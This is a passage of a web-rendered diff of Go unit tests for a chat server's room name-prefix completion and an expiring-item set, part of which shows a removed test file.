expected = []byte("-> 1 connected: foo" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
}
|
||||
|
||||
func TestRoomNamesPrefix(t *testing.T) {
|
||||
r := NewRoom()
|
||||
|
||||
s := &MockScreen{}
|
||||
members := []*Member{
|
||||
&Member{User: message.NewUserScreen(message.SimpleID("aaa"), s)},
|
||||
&Member{User: message.NewUserScreen(message.SimpleID("aab"), s)},
|
||||
&Member{User: message.NewUserScreen(message.SimpleID("aac"), s)},
|
||||
&Member{User: message.NewUserScreen(message.SimpleID("foo"), s)},
|
||||
}
|
||||
|
||||
for _, m := range members {
|
||||
if err := r.Members.Add(set.Itemize(m.ID(), m)); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
}
|
||||
|
||||
sendMsg := func(from *Member, body string) {
|
||||
// lastMsg is set during render of self messags, so we can't use NewMsg
|
||||
from.HandleMsg(message.NewPublicMsg(body, from.User))
|
||||
}
|
||||
|
||||
// Inject some activity
|
||||
sendMsg(members[2], "hi") // aac
|
||||
sendMsg(members[0], "hi") // aaa
|
||||
sendMsg(members[3], "hi") // foo
|
||||
sendMsg(members[1], "hi") // aab
|
||||
|
||||
if got, want := r.NamesPrefix("a"), []string{"aab", "aaa", "aac"}; !reflect.DeepEqual(got, want) {
|
||||
t.Errorf("got: %q; want: %q", got, want)
|
||||
}
|
||||
|
||||
sendMsg(members[2], "hi") // aac
|
||||
if got, want := r.NamesPrefix("a"), []string{"aac", "aab", "aaa"}; !reflect.DeepEqual(got, want) {
|
||||
t.Errorf("got: %q; want: %q", got, want)
|
||||
}
|
||||
|
||||
if got, want := r.NamesPrefix("f"), []string{"foo"}; !reflect.DeepEqual(got, want) {
|
||||
t.Errorf("got: %q; want: %q", got, want)
|
||||
}
|
||||
|
||||
if got, want := r.NamesPrefix("bar"), []string{}; !reflect.DeepEqual(got, want) {
|
||||
t.Errorf("got: %q; want: %q", got, want)
|
||||
}
|
||||
}
|
|
@ -1,112 +0,0 @@
|
|||
package tests
|
||||
|
||||
import (
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestSetExpiring(t *testing.T) {
|
||||
s := New()
|
||||
if s.In("foo") {
|
||||
t.Error("matched before set.")
|
||||
}
|
||||
|
||||
if err := s.Add(StringItem("foo")); err != nil {
|
||||
t.Fatalf("failed to add foo: %s", err)
|
||||
}
|
||||
if !s.In("foo") {
|
||||
t.Errorf("not matched after set")
|
||||
}
|
||||
if s.Len() != 1 {
|
||||
t.Error("not len 1 after set")
|
||||
}
|
||||
|
||||
item := Expire(StringItem("asdf"), -time.Nanosecond).(*ExpiringItem)
|
||||
if !item.Expired() {
|
||||
t.Errorf("ExpiringItem a nanosec ago is not expiring")
|
||||
}
|
||||
if err := s.Add(item); err != nil {
|
||||
t.Error("Error adding expired item to set: ", err)
|
||||
}
|
||||
if s.In("asdf") {
|
||||
t.Error("Expired item in set")
|
||||
}
|
||||
if s.Len() != 1 {
|
||||
t.Error("not len 1 after expired item")
|
||||
}
|
||||
|
||||
item = &ExpiringItem{nil, time.Now().Add(time.Minute * 5)}
|
||||
if item.Expired() {
|
||||
t.Errorf("ExpiringItem in 5 minutes is expiring now")
|
||||
}
|
||||
|
||||
item = Expire(StringItem("bar"), time.Minute*5).(*ExpiringItem)
|
||||
until := item.Time
|
||||
if !until.After(time.Now().Add(time.Minute*4)) || !until.Before(time.Now().Add(time.Minute*6)) {
|
||||
t.Errorf("until is not a minute after %s: %s", time.Now(), until)
|
||||
}
|
||||
if item.Value() == nil {
|
||||
t.Errorf("bar expired immediately")
|
||||
}
|
||||
if err := s.Add(item); err != nil {
|
||||
t.Fatalf("failed to add item: %s", err)
|
||||
}
|
||||
itemInLookup, ok := s.lookup["bar"]
|
||||
if !ok {
|
||||
t.Fatalf("bar not present in lookup even though it's not expired")
|
||||
}
|
||||
if itemInLookup != item {
|
||||
t.Fatalf("present item %#v != %#v original item", itemInLookup, item)
|
||||
}
|
||||
|
||||
if !s.In("bar") {
|
||||
t.Errorf("not matched after timed set")
|
||||
}
|
||||
if s.Len() != 2 {
|
||||
t.Error("not len 2 after set")
|
||||
}
|
||||
if err := s.Replace("bar", Expire(StringItem("quux"), time.Minute*5)); err != nil {
|
||||
t.Fatalf("failed to add quux: %s", err)
|
||||
}
|
||||
|
||||
if err := s.Replace("quux", Expire(StringItem("bar"), time.Minute*5)); err != nil {
|
||||
t.Fatalf("failed to add bar: %s", err)
|
||||
}
|
||||
if s.In("quux") {
|
||||
t.Error("quux in set after replace")
|
||||
}
|
||||
if _, err := s.Get("bar"); err != nil {
|
||||
t.Errorf("failed to get before expiry: %s", err)
|
||||
}
|
||||
if err := s.Add(StringItem("barbar")); err != nil {
|
||||
t.Fatalf("failed to add barbar")
|
||||
}
|
||||
if _, err := s.Get("barbar"); err != nil {
|
||||
t.Errorf("failed to get barbar: %s", err)
|
||||
}
|
||||
b := s.ListPrefix("b")
|
||||
if len(b) != 2 || !anyItemPresentWithKey(b, "bar") || !anyItemPresentWithKey(b, "barbar") {
|
||||
t.Errorf("b-prefix incorrect: %q", b)
|
||||
}
|
||||
|
||||
if err := s.Remove("bar"); err != nil {
|
||||
t.Fatalf("failed to remove: %s", err)
|
||||
}
|
||||
if s.Len() != 2 {
|
||||
t.Error("not len 2 after remove")
|
||||
}
|
||||
s.Clear()
|
||||
if s.Len() != 0 {
|
||||
t.Error("not len 0 after clear")
|
||||
}
|
||||
}
|
||||
|
||||
func anyItemPresentWithKey(items []Item, key string) bool {
|
||||
for _, item := range items {
|
||||
if item.Key() == key {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
Loading…
Reference in New Issue